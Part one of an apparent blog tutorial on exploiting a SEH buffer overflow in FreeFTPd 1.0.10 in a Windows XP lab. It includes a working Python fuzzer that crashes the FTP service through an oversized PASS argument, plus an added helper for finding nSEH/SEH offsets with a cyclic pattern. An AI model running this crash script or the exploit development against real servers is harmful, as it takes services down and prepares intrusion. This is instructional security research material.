SEH Buffer Overflow - FreeFTPd 1.0.10 - Part 1

In this blog post series we will look into exploiting a SEH-based buffer overflow in the FreeFTPd 1.0.10 application.

To do so, we load the application into Immunity Debugger on a Windows XP test VM. This operating system lacks memory protections such as ASLR that would get in the way of a simple buffer overflow attack.

We use the following fuzzer to trigger the overflow, so that we can confirm the vulnerability before writing our own exploit code. It logs in as anonymous and sends increasingly large PASS arguments consisting of 0x41 ('A') bytes.

#!/usr/bin/python2
# -*- coding: utf-8 -*-
import sys
import socket
BUFFERSIZE = 1024

if __name__ == "__main__":
    maxbuffersize = 10000
    buffer_inc = 5000
    IPV4 = '192.168.0.137'  # IP of the Windows XP VM running FreeFTPd
    PORT = 21               # FTP control port of the target process

    # Build buffers of buffer_inc, 2*buffer_inc, ... up to maxbuffersize bytes
    bufferarray = []
    size = buffer_inc
    while size <= maxbuffersize:
        bufferarray.append('\x41' * size)
        size += buffer_inc

    for buffer in bufferarray:
        CLIENT = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Once the debugger halts the process on the exception, the server
        # stops answering; the timeout turns that hang into a visible error.
        CLIENT.settimeout(5)
        try:
            CLIENT.connect((IPV4, PORT))
            CLIENT.recv(BUFFERSIZE)  # FTP banner
            print("Fuzzing with %4d" % len(buffer))
            CLIENT.send('USER anonymous\r\n')
            data = CLIENT.recv(BUFFERSIZE)
            print("data: %s" % data)
            CLIENT.send('PASS ' + buffer + '\r\n')
            data = CLIENT.recv(BUFFERSIZE)
            print("data: %s" % data)
        except socket.error as e:
            # No answer or a reset here means the service died on this buffer
            print("No response at %d bytes (%s), service probably crashed" % (len(buffer), e))
            sys.exit(1)
        finally:
            CLIENT.close()

After running the script with the correct IPV4 and PORT, the application crashes inside the debugger (screenshot: Overflow Address); the register state at the moment of the crash is shown in the second screenshot (screenshot: Registers View).

We can also verify that this is in fact a SEH overflow by opening the SEH chain for the exception in Immunity Debugger: the handler entry consists of our 0x41 bytes (screenshot: SEH Chain).

Our buffer overwrites the exception registration record on the stack, i.e. both the pointer to the next record (nSEH) and the handler address (SEH) that the SEH chain view displays. Now we only need to find the offsets of these two DWORDs within the buffer. Instead of sending 0x41 bytes, we send a unique, non-repeating pattern generated with Metasploit's pattern_create.rb and later look up the value that ends up in the handler field:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
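The following is an added example and not code from the original post: a small Python 3 reimplementation of the cyclic pattern that pattern_create.rb generates and of the lookup that pattern_offset.rb performs, plus a helper that derives the nSEH offset from the overwritten handler address (in the exception registration record the handler pointer directly follows the next-record pointer, so nSEH sits 4 bytes before it in our buffer). The handler value 0x37694136 used in the demonstration is constructed for illustration only; it is not a value observed in FreeFTPd.

```python
#!/usr/bin/env python3
# Added example: reimplementation of Metasploit's pattern_create / pattern_offset
# logic plus an SEH-specific helper. Not part of the original post.
import itertools
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"
# Every 3-byte triple "Uld" is unique within one cycle of 26*26*10 triples;
# beyond that the pattern repeats and offsets become ambiguous.
UNIQUE_LENGTH = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes


def pattern_create(length):
    """Return `length` bytes of the cyclic pattern Aa0Aa1Aa2...Ab0Ab1... as bytes."""
    chunks = []
    size = 0
    for up, lo, dg in itertools.cycle(itertools.product(UPPER, LOWER, DIGITS)):
        if size >= length:
            break
        chunks.append(up + lo + dg)
        size += 3
    return "".join(chunks)[:length].encode("ascii")


def pattern_offset(pattern, value):
    """Offset of `value` inside `pattern`, or None if it does not occur.

    `value` may be an int exactly as read from a register or from the SEH
    chain (it is packed little-endian into 4 bytes, which is what
    pattern_offset.rb does with a hex argument), or a str/bytes fragment.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value)
    elif isinstance(value, str):
        needle = value.encode("ascii")
    else:
        needle = bytes(value)
    index = pattern.find(needle)
    return None if index < 0 else index


def seh_offsets(pattern, handler_value):
    """Return (nseh_offset, seh_offset) from the handler DWORD seen in the SEH chain.

    The exception registration record is two DWORDs: the next-record pointer
    (nSEH) followed by the handler pointer (SEH). If our pattern lands in the
    handler field at offset X, the nSEH field was overwritten at X - 4.
    """
    seh = pattern_offset(pattern, handler_value)
    if seh is None or seh < 4:
        return None
    return seh - 4, seh


if __name__ == "__main__":
    # Send this instead of '\x41' * 10000 in the PASS command of the fuzzer
    pattern = pattern_create(10000)
    # Constructed handler value for illustration (not from FreeFTPd): the DWORD
    # the debugger would show in the handler field of the overwritten SEH record.
    observed_handler = 0x37694136
    print("pattern starts with %r" % pattern[:12])
    print("nSEH/SEH offsets: %r" % (seh_offsets(pattern, observed_handler),))
```

Because the pattern is only unique for the first 20280 bytes, a lookup on a longer buffer can match an earlier repetition; keep the pattern shorter than that, or generate a pattern with a different character set for the second part of the buffer.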